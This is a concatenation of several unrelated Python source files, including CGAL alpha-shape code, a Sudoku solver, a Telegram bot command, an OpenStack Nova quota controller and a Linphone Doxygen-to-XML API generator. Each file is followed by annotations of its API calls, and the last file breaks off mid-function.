i = f.get_ranges(0)
print(i.first)
print(i.second)
print(i.third)
was = Weighted_alpha_shape_2()
lst_wp = []
lst_wp.append(Weighted_point_2(Point_2(0, 0), 1))
lst_wp.append(Weighted_point_2(Point_2(0, 4), 1))
lst_wp.append(Weighted_point_2(Point_2(44, 0), 1))
lst_wp.append(Weighted_point_2(Point_2(44, 5), 1))
lst_wp.append(Weighted_point_2(Point_2(444, 51), 1))
lst_wp.append(Weighted_point_2(Point_2(14, 1), 1))
was.make_alpha_shape(lst_wp)
| [
"CGAL.CGAL_Kernel.Point_2",
"CGAL.CGAL_Alpha_shape_2.Alpha_shape_2",
"CGAL.CGAL_Alpha_shape_2.Weighted_alpha_shape_2"
] | [((702, 732), 'CGAL.CGAL_Alpha_shape_2.Alpha_shape_2', 'Alpha_shape_2', (['lst', '(0)', 'GENERAL'], {}), '(lst, 0, GENERAL)\n', (715, 732), False, 'from CGAL.CGAL_Alpha_shape_2 import Alpha_shape_2\n'), ((738, 759), 'CGAL.CGAL_Alpha_shape_2.Alpha_shape_2', 'Alpha_shape_2', (['lst', '(0)'], {}), '(lst, 0)\n', (751, 759), False, 'from CGAL.CGAL_Alpha_shape_2 import Alpha_shape_2\n'), ((1242, 1266), 'CGAL.CGAL_Alpha_shape_2.Weighted_alpha_shape_2', 'Weighted_alpha_shape_2', ([], {}), '()\n', (1264, 1266), False, 'from CGAL.CGAL_Alpha_shape_2 import Weighted_alpha_shape_2\n'), ((546, 559), 'CGAL.CGAL_Kernel.Point_2', 'Point_2', (['(0)', '(0)'], {}), '(0, 0)\n', (553, 559), False, 'from CGAL.CGAL_Kernel import Point_2\n'), ((572, 585), 'CGAL.CGAL_Kernel.Point_2', 'Point_2', (['(0)', '(4)'], {}), '(0, 4)\n', (579, 585), False, 'from CGAL.CGAL_Kernel import Point_2\n'), ((598, 612), 'CGAL.CGAL_Kernel.Point_2', 'Point_2', (['(44)', '(0)'], {}), '(44, 0)\n', (605, 612), False, 'from CGAL.CGAL_Kernel import Point_2\n'), ((625, 639), 'CGAL.CGAL_Kernel.Point_2', 'Point_2', (['(44)', '(5)'], {}), '(44, 5)\n', (632, 639), False, 'from CGAL.CGAL_Kernel import Point_2\n'), ((652, 668), 'CGAL.CGAL_Kernel.Point_2', 'Point_2', (['(444)', '(51)'], {}), '(444, 51)\n', (659, 668), False, 'from CGAL.CGAL_Kernel import Point_2\n'), ((681, 695), 'CGAL.CGAL_Kernel.Point_2', 'Point_2', (['(14)', '(1)'], {}), '(14, 1)\n', (688, 695), False, 'from CGAL.CGAL_Kernel import Point_2\n'), ((1310, 1323), 'CGAL.CGAL_Kernel.Point_2', 'Point_2', (['(0)', '(0)'], {}), '(0, 0)\n', (1317, 1323), False, 'from CGAL.CGAL_Kernel import Point_2\n'), ((1360, 1373), 'CGAL.CGAL_Kernel.Point_2', 'Point_2', (['(0)', '(4)'], {}), '(0, 4)\n', (1367, 1373), False, 'from CGAL.CGAL_Kernel import Point_2\n'), ((1410, 1424), 'CGAL.CGAL_Kernel.Point_2', 'Point_2', (['(44)', '(0)'], {}), '(44, 0)\n', (1417, 1424), False, 'from CGAL.CGAL_Kernel import Point_2\n'), ((1461, 1475), 'CGAL.CGAL_Kernel.Point_2', 'Point_2', (['(44)', '(5)'], {}), '(44, 5)\n', (1468, 1475), False, 'from CGAL.CGAL_Kernel import Point_2\n'), ((1512, 1528), 'CGAL.CGAL_Kernel.Point_2', 'Point_2', (['(444)', '(51)'], {}), '(444, 51)\n', (1519, 1528), False, 'from CGAL.CGAL_Kernel import Point_2\n'), ((1565, 1579), 'CGAL.CGAL_Kernel.Point_2', 'Point_2', (['(14)', '(1)'], {}), '(14, 1)\n', (1572, 1579), False, 'from CGAL.CGAL_Kernel import Point_2\n')] |
import scene
class MyScene(scene.Scene):
def setup(self):
self.label_node = scene.LabelNode('A',
position=(100,400), parent=self)
self.start_flag = False
def update(self):
if self.start_flag:
x,y = self.label_node.position
if x < 340:
self.label_node.position = (x+2, y)
else:
self.start_flag = False
def touch_ended(self, touch):
self.start_flag = True
scene.run(MyScene())
| [
"scene.LabelNode"
] | [((91, 145), 'scene.LabelNode', 'scene.LabelNode', (['"""A"""'], {'position': '(100, 400)', 'parent': 'self'}), "('A', position=(100, 400), parent=self)\n", (106, 145), False, 'import scene\n')] |
from bot.commands import BaseCommand
import mongo
class DisconnectCommand(BaseCommand):
_COMMAND = 'disconnect'
_DESCRIPTION = 'Close currently active chat.'
_SUCCESS_MESSAGE = 'Disconnected from chat'
def _callback(self, user, _bot, update, **kwargs):
return self._call(user, _bot, update, **kwargs)
def _call(self, user, _bot, update, **kwargs):
chat = mongo.chats.get_active_chat_by_telegram_id(user.id)
if chat:
mongo.chats.disable_chat(chat['_id'])
return True
_bot.send_message(
user.id,
'You are not connected to any vk user',
)
return False
| [
"mongo.chats.get_active_chat_by_telegram_id",
"mongo.chats.disable_chat"
] | [((397, 448), 'mongo.chats.get_active_chat_by_telegram_id', 'mongo.chats.get_active_chat_by_telegram_id', (['user.id'], {}), '(user.id)\n', (439, 448), False, 'import mongo\n'), ((478, 515), 'mongo.chats.disable_chat', 'mongo.chats.disable_chat', (["chat['_id']"], {}), "(chat['_id'])\n", (502, 515), False, 'import mongo\n')] |
import numpy as np
board = np.zeros(shape=(9, 9))
count = 0
def solve():
global count
count += 1
if count % 1000 == 0:
print('\rCurrent number of computations made:', count, end='')
freePos = find()
if freePos is None:
return True
i = freePos[0]
j = freePos[1]
for w in range(1, 10):
if possible(w, freePos):
board[i][j] = w
if solve():
return True
board[i][j] = 0
return False
def find():
for i in range(9):
for j in range(9):
if board[i][j] == 0:
return [i, j]
return None
def possible(value, position):
# position = (i, j) tuple
i = position[0]
j = position[1]
# checks row and column for repeat value
if (value in board[:, j]) or (value in board[i]):
return False
# reset to i,j - top left square
i = (i // 3) * 3
j = (j // 3) * 3
# check all squares in square
for n in range(i, i + 3):
for m in range(j, j + 3):
if board[n][m] == value:
return False
return True
def change(position):
# position = (i, j) tuple
i = position[0]
j = position[1]
for w in range(1, 10):
if w not in board[:, j] and w not in board[i]:
board[i][j] = w
return True
return False
def initialize():
print("Please enter the values on the board starting from left to right, top to bottom, 0 for blank")
integerChunk = input("Numbers: ")
pos = 0
for i in range(9):
for j in range(9):
board[i][j] = int(integerChunk[pos])
pos += 1
def displayBoard():
for i in range(3):
for j in range(9):
if board[i][j] == 0:
print(" ", end="")
else:
print("%d " % board[i][j], end="")
if (j == 2) or (j == 5):
print("| ", end="")
if j == 8:
print("")
print("- - - - - - - - - - -")
for i in range(3, 6):
for j in range(9):
if board[i][j] == 0:
print(" ", end="")
else:
print("%d " % board[i][j], end="")
if (j == 2) or (j == 5):
print("| ", end="")
if j == 8:
print("")
print("- - - - - - - - - - -")
for i in range(6, 9):
for j in range(9):
if board[i][j] == 0:
print(" ", end="")
else:
print("%d " % board[i][j], end="")
if (j == 2) or (j == 5):
print("| ", end="")
if j == 8:
print("")
def main():
initialize()
print("Is this the correct board? Press enter to continue or 'q' to exit program.")
displayBoard()
response = input()
if response == "q":
exit()
print("---------------SOLVING---------------\n")
solve()
print("\r\rSOLUTION")
displayBoard()
print("\nTotal number of computations:", count)
if __name__ == "__main__":
main()
| [
"numpy.zeros"
] | [((28, 50), 'numpy.zeros', 'np.zeros', ([], {'shape': '(9, 9)'}), '(shape=(9, 9))\n', (36, 50), True, 'import numpy as np\n')] |
# Copyright 2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from nova.api.openstack import api_version_request
from nova.api.openstack.api_version_request \
import MIN_WITHOUT_PROXY_API_SUPPORT_VERSION
from nova.api.openstack import extensions
from nova.api.openstack import wsgi
from nova.policies import used_limits as ul_policies
from nova import quota
QUOTAS = quota.QUOTAS
class UsedLimitsController(wsgi.Controller):
@staticmethod
def _reserved(req):
try:
return int(req.GET['reserved'])
except (ValueError, KeyError):
return False
@wsgi.extends
@extensions.expected_errors(())
def index(self, req, resp_obj):
context = req.environ['nova.context']
project_id = self._project_id(context, req)
quotas = QUOTAS.get_project_quotas(context, project_id, usages=True)
if api_version_request.is_supported(
req, min_version=MIN_WITHOUT_PROXY_API_SUPPORT_VERSION):
quota_map = {
'totalRAMUsed': 'ram',
'totalCoresUsed': 'cores',
'totalInstancesUsed': 'instances',
'totalServerGroupsUsed': 'server_groups',
}
else:
quota_map = {
'totalRAMUsed': 'ram',
'totalCoresUsed': 'cores',
'totalInstancesUsed': 'instances',
'totalFloatingIpsUsed': 'floating_ips',
'totalSecurityGroupsUsed': 'security_groups',
'totalServerGroupsUsed': 'server_groups',
}
used_limits = {}
for display_name, key in quota_map.items():
if key in quotas:
reserved = (quotas[key]['reserved']
if self._reserved(req) else 0)
used_limits[display_name] = quotas[key]['in_use'] + reserved
resp_obj.obj['limits']['absolute'].update(used_limits)
def _project_id(self, context, req):
if 'tenant_id' in req.GET:
tenant_id = req.GET.get('tenant_id')
target = {
'project_id': tenant_id,
'user_id': context.user_id
}
context.can(ul_policies.BASE_POLICY_NAME, target)
return tenant_id
return context.project_id
| [
"nova.api.openstack.extensions.expected_errors",
"nova.api.openstack.api_version_request.is_supported"
] | [((1173, 1203), 'nova.api.openstack.extensions.expected_errors', 'extensions.expected_errors', (['()'], {}), '(())\n', (1199, 1203), False, 'from nova.api.openstack import extensions\n'), ((1426, 1519), 'nova.api.openstack.api_version_request.is_supported', 'api_version_request.is_supported', (['req'], {'min_version': 'MIN_WITHOUT_PROXY_API_SUPPORT_VERSION'}), '(req, min_version=\n MIN_WITHOUT_PROXY_API_SUPPORT_VERSION)\n', (1458, 1519), False, 'from nova.api.openstack import api_version_request\n')] |
#!/usr/bin/python
# Copyright (C) 2014 Belledonne Communications SARL
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
import argparse
import os
import six
import string
import sys
import xml.etree.ElementTree as ET
import xml.dom.minidom as minidom
import metadoc
class CObject:
def __init__(self, name):
self.name = name.strip()
self.briefDescription = ''
self.detailedDescription = None
self.deprecated = False
self.briefDoc = None
class CEnumValue(CObject):
def __init__(self, name):
CObject.__init__(self, name)
self.value = None
class CEnum(CObject):
def __init__(self, name):
CObject.__init__(self, name)
self.values = []
self.associatedTypedef = None
def addValue(self, value):
self.values.append(value)
class CStructMember(CObject):
def __init__(self, name, t):
CObject.__init__(self, name)
self.ctype = t.strip()
class CStruct(CObject):
def __init__(self, name):
CObject.__init__(self, name)
self.members = []
self.associatedTypedef = None
def addMember(self, member):
self.members.append(member)
class CTypedef(CObject):
def __init__(self, name, definition):
CObject.__init__(self, name)
self.definition = definition.strip()
class CArgument(CObject):
def __init__(self, t, name = '', enums = [], structs = []):
CObject.__init__(self, name)
self.description = None
self.containedType = None
keywords = [ 'const', 'struct', 'enum', 'signed', 'unsigned', 'short', 'long', '*' ]
fullySplittedType = []
splittedType = t.strip().split(' ')
for s in splittedType:
if s.startswith('*'):
fullySplittedType.append('*')
if len(s) > 1:
fullySplittedType.append(s[1:])
elif s.endswith('*'):
fullySplittedType.append(s[:-1])
fullySplittedType.append('*')
else:
fullySplittedType.append(s)
if 'MS2_DEPRECATED' in fullySplittedType:
fullySplittedType.remove('MS2_DEPRECATED')
elif 'LINPHONE_DEPRECATED' in fullySplittedType:
fullySplittedType.remove('LINPHONE_DEPRECATED')
isStruct = False
isEnum = False
self.ctype = 'int' # Default to int so that the result is correct eg. for 'unsigned short'
for s in fullySplittedType:
if not s in keywords:
self.ctype = s
if s == 'struct':
isStruct = True
if s == 'enum':
isEnum = True
if isStruct:
for st in structs:
if st.associatedTypedef is not None:
self.ctype = st.associatedTypedef.name
elif isEnum:
for e in enums:
if e.associatedTypedef is not None:
self.ctype = e.associatedTypedef.name
if self.ctype == 'int' and 'int' not in fullySplittedType:
if fullySplittedType[-1] == '*':
fullySplittedType.insert(-1, 'int')
else:
fullySplittedType.append('int')
self.completeType = ' '.join(fullySplittedType)
def __str__(self):
return self.completeType + " " + self.name
class CArgumentsList:
def __init__(self):
self.arguments = []
def addArgument(self, arg):
self.arguments.append(arg)
def __len__(self):
return len(self.arguments)
def __getitem__(self, key):
return self.arguments[key]
def __str__(self):
argstr = []
for arg in self.arguments:
argstr.append(str(arg))
return ', '.join(argstr)
class CFunction(CObject):
def __init__(self, name, returnarg, argslist):
CObject.__init__(self, name)
self.returnArgument = returnarg
self.arguments = argslist
self.location = None
class CEvent(CFunction):
pass
class CProperty:
def __init__(self, name):
self.name = name
self.getter = None
self.setter = None
class CClass(CObject):
def __init__(self, st):
CObject.__init__(self, st.associatedTypedef.name)
if st.deprecated or st.associatedTypedef.deprecated:
self.deprecated = True
if len(st.associatedTypedef.briefDescription) > 0:
self.briefDescription = st.associatedTypedef.briefDescription
elif len(st.briefDescription) > 0:
self.briefDescription = st.briefDescription
if st.associatedTypedef.detailedDescription is not None:
self.detailedDescription = st.associatedTypedef.detailedDescription
elif st.detailedDescription is not None:
self.detailedDescription = st.detailedDescription
self.__struct = st
self.events = {}
self.classMethods = {}
self.instanceMethods = {}
self.properties = {}
self.__computeCFunctionPrefix()
def __computeCFunctionPrefix(self):
self.cFunctionPrefix = ''
first = True
for l in self.name:
if l.isupper() and not first:
self.cFunctionPrefix += '_'
self.cFunctionPrefix += l.lower()
first = False
self.cFunctionPrefix += '_'
def __addPropertyGetter(self, name, f):
if not name in self.properties:
prop = CProperty(name)
self.properties[name] = prop
self.properties[name].getter = f
def __addPropertySetter(self, name, f):
if not name in self.properties:
prop = CProperty(name)
self.properties[name] = prop
self.properties[name].setter = f
def __addClassMethod(self, f):
if not f.name in self.classMethods:
self.classMethods[f.name] = f
def __addInstanceMethod(self, f):
name = f.name[len(self.cFunctionPrefix):]
if name.startswith('get_') and len(f.arguments) == 1:
self.__addPropertyGetter(name[4:], f)
elif name.startswith('is_') and len(f.arguments) == 1 and f.returnArgument.ctype == 'bool_t':
self.__addPropertyGetter(name, f)
elif name.endswith('_enabled') and len(f.arguments) == 1 and f.returnArgument.ctype == 'bool_t':
self.__addPropertyGetter(name, f)
elif name.startswith('set_') and len(f.arguments) == 2:
self.__addPropertySetter(name[4:], f)
elif name.startswith('enable_') and len(f.arguments) == 2 and f.arguments[1].ctype == 'bool_t':
self.__addPropertySetter(name[7:] + '_enabled', f)
else:
if not f.name in self.instanceMethods:
self.instanceMethods[f.name] = f
def addEvent(self, ev):
if not ev.name in self.events:
self.events[ev.name] = ev
def addMethod(self, f):
if len(f.arguments) > 0 and f.arguments[0].ctype == self.name:
self.__addInstanceMethod(f)
else:
self.__addClassMethod(f)
class Project:
def __init__(self):
self.verbose = False
self.prettyPrint = False
self.enums = []
self.__structs = []
self.__typedefs = []
self.__events = []
self.__functions = []
self.classes = []
self.docparser = metadoc.Parser()
def add(self, elem):
if isinstance(elem, CClass):
if self.verbose:
print("Adding class " + elem.name)
self.classes.append(elem)
elif isinstance(elem, CEnum):
if self.verbose:
print("Adding enum " + elem.name)
for ev in elem.values:
print("\t" + ev.name)
self.enums.append(elem)
elif isinstance(elem, CStruct):
if self.verbose:
print("Adding struct " + elem.name)
for sm in elem.members:
print("\t" + sm.ctype + " " + sm.name)
self.__structs.append(elem)
elif isinstance(elem, CTypedef):
if self.verbose:
print("Adding typedef " + elem.name)
print("\t" + elem.definition)
self.__typedefs.append(elem)
elif isinstance(elem, CEvent):
if self.verbose:
print("Adding event " + elem.name)
print("\tReturns: " + elem.returnArgument.ctype)
print("\tArguments: " + str(elem.arguments))
self.__events.append(elem)
elif isinstance(elem, CFunction):
if self.verbose:
print("Adding function " + elem.name)
print("\tReturns: " + elem.returnArgument.ctype)
print("\tArguments: " + str(elem.arguments))
self.__functions.append(elem)
def __cleanDescription(self, descriptionNode):
for para in descriptionNode.findall('./para'):
for n in para.findall('./parameterlist'):
para.remove(n)
for n in para.findall("./simplesect[@kind='return']"):
para.remove(n)
for n in para.findall("./simplesect[@kind='see']"):
t = ''.join(n.itertext())
n.clear()
n.tag = 'see'
n.text = t
for n in para.findall("./simplesect[@kind='note']"):
n.tag = 'note'
n.attrib = {}
for n in para.findall(".//xrefsect"):
para.remove(n)
for n in para.findall('.//ref'):
n.attrib = {}
for n in para.findall(".//bctbx_list"):
para.remove(n)
if descriptionNode.tag == 'parameterdescription':
descriptionNode.tag = 'description'
if descriptionNode.tag == 'simplesect':
descriptionNode.tag = 'description'
descriptionNode.attrib = {}
return descriptionNode
def __canBeWrapped(self, node):
return node.find('./detaileddescription//donotwrap') is None
def __discoverClasses(self):
for td in self.__typedefs:
if td.definition.startswith('enum '):
for e in self.enums:
if (e.associatedTypedef is None) and td.definition[5:] == e.name:
e.associatedTypedef = td
break
elif td.definition.startswith('struct '):
structFound = False
for st in self.__structs:
if (st.associatedTypedef is None) and td.definition[7:] == st.name:
st.associatedTypedef = td
structFound = True
break
if not structFound:
name = td.definition[7:]
print("Structure with no associated typedef: " + name)
st = CStruct(name)
st.associatedTypedef = td
self.add(st)
for td in self.__typedefs:
if td.definition.startswith('struct '):
for st in self.__structs:
if st.associatedTypedef == td:
cclass = CClass(st)
cclass.briefDoc = td.briefDoc
self.add(cclass)
break
elif ('Linphone' + td.definition) == td.name:
st = CStruct(td.name)
st.associatedTypedef = td
cclass = CClass(st)
cclass.briefDoc = td.briefDoc
self.add(st)
self.add(cclass)
# Sort classes by length of name (longest first), so that methods are put in the right class
self.classes.sort(key = lambda c: len(c.name), reverse = True)
for e in self.__events:
eventAdded = False
for c in self.classes:
if c.name.endswith('Cbs') and e.name.startswith(c.name):
c.addEvent(e)
eventAdded = True
break
if not eventAdded:
for c in self.classes:
if e.name.startswith(c.name):
c.addEvent(e)
eventAdded = True
break
for f in self.__functions:
for c in self.classes:
if c.cFunctionPrefix == f.name[0 : len(c.cFunctionPrefix)]:
c.addMethod(f)
break
def __parseCEnumValueInitializer(self, initializer):
initializer = initializer.strip()
if not initializer.startswith('='):
return None
initializer = initializer[1:]
initializer.strip()
return initializer
def __parseCEnumValue(self, node):
ev = CEnumValue(node.find('./name').text)
initializerNode = node.find('./initializer')
if initializerNode is not None:
ev.value = self.__parseCEnumValueInitializer(initializerNode.text)
deprecatedNode = node.find(".//xrefsect[xreftitle='Deprecated']")
if deprecatedNode is not None:
ev.deprecated = True
ev.briefDescription = ''.join(node.find('./briefdescription').itertext()).strip()
ev.briefDoc = self.docparser.parse_description(node.find('./briefdescription'))
ev.detailedDescription = self.__cleanDescription(node.find('./detaileddescription'))
return ev
def __parseCEnumMemberdef(self, node):
if not Project.__canBeWrapped(self, node):
return None
e = CEnum(node.find('./name').text)
deprecatedNode = node.find(".//xrefsect[xreftitle='Deprecated']")
if deprecatedNode is not None:
e.deprecated = True
e.briefDescription = ''.join(node.find('./briefdescription').itertext()).strip()
e.briefDoc = self.docparser.parse_description(node.find('./briefdescription'))
e.detailedDescription = self.__cleanDescription(node.find('./detaileddescription'))
enumvalues = node.findall("enumvalue[@prot='public']")
for enumvalue in enumvalues:
ev = self.__parseCEnumValue(enumvalue)
e.addValue(ev)
return e
def __findCEnum(self, tree):
memberdefs = tree.findall("./compounddef[@kind='group']/sectiondef[@kind='enum']/memberdef[@kind='enum'][@prot='public']")
for m in memberdefs:
e = self.__parseCEnumMemberdef(m)
self.add(e)
def __parseCStructMember(self, node, structname):
name = node.find('./name').text
definition = node.find('./definition').text
t = definition[0:definition.find(structname + "::" + name)]
sm = CStructMember(name, t)
deprecatedNode = node.find(".//xrefsect[xreftitle='Deprecated']")
if deprecatedNode is not None:
sm.deprecated = True
sm.briefDescription = ''.join(node.find('./briefdescription').itertext()).strip()
sm.briefDoc = self.docparser.parse_description(node.find('./briefdescription'))
sm.detailedDescription = self.__cleanDescription(node.find('./detaileddescription'))
return sm
def __parseCStructCompounddef(self, node):
s = CStruct(node.find('./compoundname').text)
deprecatedNode = node.find(".//xrefsect[xreftitle='Deprecated']")
if deprecatedNode is not None:
s.deprecated = True
s.briefDescription = ''.join(node.find('./briefdescription').itertext()).strip()
s.briefDoc = self.docparser.parse_description(node.find('./briefdescription'))
s.detailedDescription = self.__cleanDescription(node.find('./detaileddescription'))
structmembers = node.findall("sectiondef/memberdef[@kind='variable'][@prot='public']")
for structmember in structmembers:
sm = self.__parseCStructMember(structmember, s.name)
s.addMember(sm)
return s
def __findCStruct(self, tree):
compounddefs = tree.findall("./compounddef[@kind='struct'][@prot='public']")
for c in compounddefs:
s = self.__parseCStructCompounddef(c)
self.add(s)
def __parseCTypedefMemberdef(self, node):
if not Project.__canBeWrapped(self, node):
return None
name = node.find('./name').text
definition = node.find('./definition').text
if definition.startswith('typedef '):
definition = definition[8 :]
if name.endswith('Cb'):
pos = definition.find("(*")
if pos == -1:
return None
returntype = definition[0:pos].strip()
returnarg = CArgument(returntype, enums = self.enums, structs = self.__structs)
returndesc = node.find("./detaileddescription/para/simplesect[@kind='return']")
if returndesc is not None:
if returnarg.ctype == 'MSList' or returnarg.ctype == 'bctbx_list_t':
n = returndesc.find('.//bctbxlist')
if n is not None:
returnarg.containedType = n.text
returnarg.description = self.__cleanDescription(returndesc)
elif returnarg.completeType != 'void':
missingDocWarning += "\tReturn value is not documented\n"
definition = definition[pos + 2 :]
pos = definition.find("(")
definition = definition[pos + 1 : -1]
argslist = CArgumentsList()
for argdef in definition.split(', '):
argType = ''
starPos = argdef.rfind('*')
spacePos = argdef.rfind(' ')
if starPos != -1:
argType = argdef[0 : starPos + 1]
argName = argdef[starPos + 1 :]
elif spacePos != -1:
argType = argdef[0 : spacePos]
argName = argdef[spacePos + 1 :]
argslist.addArgument(CArgument(argType, argName, self.enums, self.__structs))
if len(argslist) > 0:
paramdescs = node.findall("detaileddescription/para/parameterlist[@kind='param']/parameteritem")
if paramdescs:
for arg in argslist.arguments:
for paramdesc in paramdescs:
if arg.name == paramdesc.find('./parameternamelist').find('./parametername').text:
arg.description = self.__cleanDescription(paramdesc.find('./parameterdescription'))
missingDocWarning = ''
for arg in argslist.arguments:
if arg.description == None:
missingDocWarning += "\t'" + arg.name + "' parameter not documented\n";
if missingDocWarning != '':
print(name + ":\n" + missingDocWarning)
f = CEvent(name, returnarg, argslist)
deprecatedNode = node.find(".//xrefsect[xreftitle='Deprecated']")
if deprecatedNode is not None:
f.deprecated = True
f.briefDescription = ''.join(node.find('./briefdescription').itertext()).strip()
f.briefDoc = self.docparser.parse_description(node.find('./briefdescription'))
f.detailedDescription = self.__cleanDescription(node.find('./detaileddescription'))
return f
else:
pos = definition.rfind(" " + name)
if pos != -1:
definition = definition[0 : pos]
td = CTypedef(name, definition)
deprecatedNode = node.find(".//xrefsect[xreftitle='Deprecated']")
if deprecatedNode is not None:
td.deprecated = True
td.briefDescription = ''.join(node.find('./briefdescription').itertext()).strip()
td.briefDoc = self.docparser.parse_description(node.find('./briefdescription'))
td.detailedDescription = self.__cleanDescription(node.find('./detaileddescription'))
return td
return None
def __findCTypedef(self, tree):
memberdefs = tree.findall("./compounddef[@kind='group']/sectiondef[@kind='typedef']/memberdef[@kind='typedef'][@prot='public']")
for m in memberdefs:
td = self.__parseCTypedefMemberdef(m)
self.add(td)
def __parseCFunctionMemberdef(self, node):
if not Project.__canBeWrapped(self, node):
return None
internal = node.find("./detaileddescription/internal")
if internal is not None:
return None
missingDocWarning = ''
name = node.find('./name').text
t = ''.join(node.find('./type').itertext())
returnarg = CArgument(t, enums = self.enums, structs = self.__structs)
returndesc = node.find("./detaileddescription/para/simplesect[@kind='return']")
if returndesc is not None:
if returnarg.ctype == 'MSList' or returnarg.ctype == 'bctbx_list_t':
n = returndesc.find('.//bctbxlist')
if n is not None:
returnarg.containedType = n.text
returnarg.description = self.__cleanDescription(returndesc)
elif returnarg.completeType != 'void':
missingDocWarning += "\tReturn value is not documented\n"
argslist = CArgumentsList()
argslistNode = node.findall('./param')
for argNode in argslistNode:
argType = ''.join(argNode.find('./type').itertext())
argName = ''
argNameNode = argNode.find('./declname')
if argNameNode is not None:
argName = ''.join(argNameNode.itertext())
if argType != 'void':
argslist.addArgument(CArgument(argType, argName, self.enums, self.__structs))
if len(argslist) > 0:
paramdescs = node.findall("./detaileddescription/para/parameterlist[@kind='param']/parameteritem")
if paramdescs:
for arg in argslist.arguments:
for paramdesc in paramdescs:
if arg.name == paramdesc.find('./parameternamelist').find('./parametername').text:
if arg.ctype == 'MSList' or arg.ctype == 'bctbx_list_t':
n = paramdesc.find('.//bctbxlist')
if n is not None:
arg.containedType = n.text
arg.description = self.__cleanDescription(paramdesc.find('./parameterdescription'))
missingDocWarning = ''
for arg in argslist.arguments:
if arg.description == None:
missingDocWarning += "\t'" + arg.name + "' parameter not documented\n";
f = CFunction(name, returnarg, argslist)
deprecatedNode = node.find(".//xrefsect[xreftitle='Deprecated']")
if deprecatedNode is not None:
f.deprecated = True
f.briefDescription = ''.join(node.find('./briefdescription').itertext()).strip()
f.briefDoc = self.docparser.parse_description(node.find('./briefdescription'))
f.detailedDescription = self.__cleanDescription(node.find('./detaileddescription'))
if f.briefDescription == '' and ''.join(f.detailedDescription.itertext()).strip() == '':
return None
locationNode = node.find('./location')
if locationNode is not None:
f.location = locationNode.get('file')
if not f.location.endswith('.h'):
missingDocWarning += "\tNot documented in a header file ('" + f.location + "')\n";
if missingDocWarning != '':
print(name + ":\n" + missingDocWarning)
return f
def __findCFunction(self, tree):
memberdefs = tree.findall("./compounddef[@kind='group']/sectiondef[@kind='func']/memberdef[@kind='function'][@prot='public'][@static='no']")
for m in memberdefs:
f = self.__parseCFunctionMemberdef(m)
if f is not None:
self.add(f)
def initFromFiles(self, xmlfiles):
trees = []
for f in xmlfiles:
tree = None
try:
if self.verbose:
print("Parsing XML file: " + f.name)
tree = ET.parse(f)
except ET.ParseError as e:
print(e)
if tree is not None:
trees.append(tree)
for tree in trees:
self.__findCEnum(tree)
for tree in trees:
self.__findCStruct(tree)
for tree in trees:
self.__findCTypedef(tree)
for tree in trees:
self.__findCFunction(tree)
self.__discoverClasses()
def initFromDir(self, xmldir):
files = [ os.path.join(xmldir, f) for f in os.listdir(xmldir) if (os.path.isfile(os.path.join(xmldir, f)) and f.endswith('.xml')) ]
self.initFromFiles(files)
def check(self):
for c in self.classes:
for name, p in six.iteritems(c.properties):
if p.getter is None and p.setter is not None:
print("Property '" + name + "' of class '" + c.name + "' has a setter but no getter")
class Generator:
def __init__(self, outputfile):
self.__outputfile = outputfile
def __generateEnum(self, cenum, enumsNode):
enumNodeAttributes = { 'name' : cenum.name, 'deprecated' : str(cenum.deprecated).lower() }
if cenum.associatedTypedef is not None:
enumNodeAttributes['name'] = cenum.associatedTypedef.name
enumNode = ET.SubElement(enumsNode, 'enum', enumNodeAttributes)
if cenum.briefDescription != '':
enumBriefDescriptionNode = ET.SubElement(enumNode, 'briefdescription')
enumBriefDescriptionNode.text = cenum.briefDescription
enumNode.append(cenum.detailedDescription)
if len(cenum.values) > 0:
enumValuesNode = ET.SubElement(enumNode, 'values')
for value in cenum.values:
enumValuesNodeAttributes = { 'name' : value.name, 'deprecated' : str(value.deprecated).lower() }
valueNode = ET.SubElement(enumValuesNode, 'value', enumValuesNodeAttributes)
if value.briefDescription != '':
valueBriefDescriptionNode = ET.SubElement(valueNode, 'briefdescription')
valueBriefDescriptionNode.text = value.briefDescription
valueNode.append(value.detailedDescription)
def __generateFunction(self, parentNode, nodeName, f):
functionAttributes = { 'name' : f.name, 'deprecated' : str(f.deprecated).lower() }
if f.location is not None:
functionAttributes['location'] = f.location
functionNode = ET.SubElement(parentNode, nodeName, functionAttributes)
returnValueAttributes = { 'type' : f.returnArgument.ctype, 'completetype' : f.returnArgument.completeType }
if f.returnArgument.containedType is not None:
returnValueAttributes['containedtype'] = f.returnArgument.containedType
returnValueNode = ET.SubElement(functionNode, 'return', returnValueAttributes)
if f.returnArgument.description is not None:
returnValueNode.append(f.returnArgument.description)
argumentsNode = ET.SubElement(functionNode, 'arguments')
for arg in f.arguments:
argumentNodeAttributes = { 'name' : arg.name, 'type' : arg.ctype, 'completetype' : arg.completeType }
if arg.containedType is not None:
argumentNodeAttributes['containedtype'] = arg.containedType
argumentNode = ET.SubElement(argumentsNode, 'argument', argumentNodeAttributes)
if arg.description is not None:
argumentNode.append(arg.description)
if f.briefDescription != '':
functionBriefDescriptionNode = ET.SubElement(functionNode, 'briefdescription')
functionBriefDescriptionNode.text = f.briefDescription
functionNode.append(f.detailedDescription)
def __generateClass(self, cclass, classesNode):
# Do not include classes that contain nothing
if len(cclass.events) == 0 and len(cclass.classMethods) == 0 and \
len(cclass.instanceMethods) == 0 and len(cclass.properties) == 0:
return
# Check the capabilities of the class
has_ref_method = False
has_unref_method = False
has_destroy_method = False
for methodname in cclass.instanceMethods:
methodname_without_prefix = methodname.replace(cclass.cFunctionPrefix, '')
if methodname_without_prefix == 'ref':
has_ref_method = True
elif methodname_without_prefix == 'unref':
has_unref_method = True
elif methodname_without_prefix == 'destroy':
has_destroy_method = True
refcountable = False
destroyable = False
if has_ref_method and has_unref_method:
refcountable = True
if has_destroy_method:
